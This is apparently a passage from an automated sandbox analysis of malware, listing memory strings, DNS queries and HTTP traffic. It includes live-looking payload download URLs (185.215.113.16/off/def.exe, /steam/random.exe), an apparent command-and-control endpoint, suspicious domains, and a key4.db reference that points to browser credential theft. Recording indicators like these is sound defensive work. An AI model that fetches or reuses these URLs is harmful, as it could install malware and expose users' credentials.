Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: media.{0}.allow-x64-plugin-on-arm64media.gmp-manager.cert.checkAttributesSitePermsAddonInstall#cancel called twice on onPrefEnabledChanged() - removing gmp directory resource://gre/modules/UpdateUtils.sys.mjsThis should only be called from XPCShell testsipc:first-content-process-createdKEY_PLUGIN_LAST_INSTALL_FAIL_REASONresource://gre/modules/amManager.sys.mjsstartup - adding gmp directory failed with resource://gre/modules/AddonManager.sys.mjsstartup - adding clearkey CDM failedspeculativeConnectWithOriginAttributes - the given reason to update is not supportedmedia.gmp-manager.cert.requireBuiltInThis should only be called from XPCShell testssitepermsaddon-provider-registereddom.sitepermsaddon-provider.enabledonPrefEMEGlobalEnabledChanged() id=uninstallPlugin() - unregistering gmp directory startup - adding clearkey CDM directory @mozilla.org/spellchecker/engine;1findUpdates() - found update for media.gmp-manager.secondsBetweenChecksaddGatedPermissionTypesForXpcShellTestsonPrefEnabledChanged() - adding gmp directory resource://gre/modules/addons/XPIProvider.jsmFileUtils_closeAtomicFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://libs.coremetrics.com/eluminate.jsresource://gre/modules/FileUtils.sys.mjs*://www.everestjs.net/static/st.v3.js**://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://connect.facebook.net/*/sdk.js*@mozilla.org/network/file-output-stream;1*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1 background service worker script url: equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: nimbus-desktop-experimentshttps://www.facebook.com/optInToExperiment/recipe<https://www.amazon.co.uk/https://www.wikipedia.org/nimbus:studies-enabled-changed equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2894451888.00000209A852D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2891470046.00000209A82F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2894451888.00000209A85E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2894451888.00000209A855F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2891470046.00000209A82AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2891470046.00000209A82F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}@mozilla.org/uriloader/handler-service;1resource://devtools/server/devtools-server.jsdevtools/client/framework/devtools-browserdevtools/client/framework/devtoolsJSON Viewer's onSave failed in startPersistencebrowser.fixup.domainsuffixwhitelist.Failed to listen. Listener already attached.get FIXUP_FLAG_FORCE_ALTERNATE_URIUnable to start devtools server on Got invalid request to save JSON datadevtools.debugger.remote-websocketresource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=defaultNo callback set for this channel.browser.fixup.dns_first_for_single_wordsdevtools.performance.popup.feature-flag@mozilla.org/network/protocol;1?name=fileDevTools telemetry entry point failed: ^([a-z+.-]+:\/{0,3})*([^\/@]+@).+DevToolsStartup.jsm:handleDebuggerFlagFailed to listen. Callback argument missing.devtools.performance.recording.ui-base-urlWebChannel/this._originCheckCallback^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Failed to execute WebChannel callback:Scheme should be either http or httpshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content process_finalizeInternal/this._finalizePromise<resource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%sextension/default-theme@mozilla.org/extendedDataresource://gre/modules/ExtHandlerService.sys.mjsgecko.handlerService.defaultHandlersVersionisDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/JSONFile.sys.mjshttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}extractScheme/fixupChangedProtocol<resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1@mozilla.org/uriloader/web-handler-app;1{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%s@mozilla.org/uriloader/local-handler-app;1http://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1@mozilla.org/network/simple-stream-listener;1@mozilla.org/intl/converter-input-stream;1https://mail.yahoo.co.jp/compose/?To=%snewChannel requires a single object argumenthttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionNon-zero amount of bytes must be specifiedpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/uriloader/handler-service;1resource://gre/modules/Integration.sys.mjsFirst argument should be an nsIInputStreamMust have a source and a callbackSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/scriptableinpu
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2878134580.00000209A7A7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: d015c0e328.exe, d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2836656383.0000000001641000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/R
Source: d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/U
Source: d015c0e328.exe, d015c0e328.exe, 00000007.00000003.2798934875.0000000001131000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840075446.0000000001645000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2836656383.0000000001645000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: d015c0e328.exe, 00000007.00000003.2797016567.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeBY
Source: d015c0e328.exe, 00000007.00000003.2797016567.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: d015c0e328.exe, 00000007.00000002.2904744965.0000000000F5B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exes
Source: d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exesW
Source: d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/se
Source: d015c0e328.exe, d015c0e328.exe, 00000007.00000002.2905216851.0000000001141000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: d015c0e328.exe, 00000007.00000003.2798934875.000000000113E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeter
Source: d015c0e328.exe, 0000000A.00000003.2839657779.0000000001636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/t
Source: d015c0e328.exe, 00000007.00000003.2799971962.0000000001111000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: d015c0e328.exe, 0000000A.00000003.2840231634.00000000015B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exeault-release/key4.dbPK
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp, 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/08
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/3
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/I
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/:
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
Source: 9b8665be8a.exe, 00000008.00000002.2537402557.00000000013E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA339000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA339000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA339000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA339000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: d015c0e328.exe, 00000016.00000003.2957610878.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2959293839.00000000004FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.2891470046.00000209A8262000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2961463851.00000209AA1E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3030128647.00000209AFD40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000002.2940971557.00000209A9603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959507952.00000209AA029000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlskipContentPolicyCheckForWebRequestredirectChainInclud
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000019.00000002.2804534100.00000209A348A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000019.00000002.2804534100.00000209A3461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000019.00000002.2804534100.00000209A348A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000019.00000002.2804534100.00000209A3461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000019.00000002.2804534100.00000209A348A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2639249130.00000209A7BD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2991507780.00000209AA3EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959507952.00000209AA08C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFEB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3040511865.00000209B0036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2719231877.00000209AFF65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2726569286.00000209AA14C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2768616084.00000209AFFC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2724702547.00000209AA3F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2745476179.00000209AFF66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2882778473.00000209A7D08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2881044448.00000209A7B99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3000812741.00000209AB17C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039263764.00000209AFF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3000812741.00000209AB13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2961463851.00000209AA1E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2881578147.00000209A7BD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2639249130.00000209A7B98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3030128647.00000209AFD40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
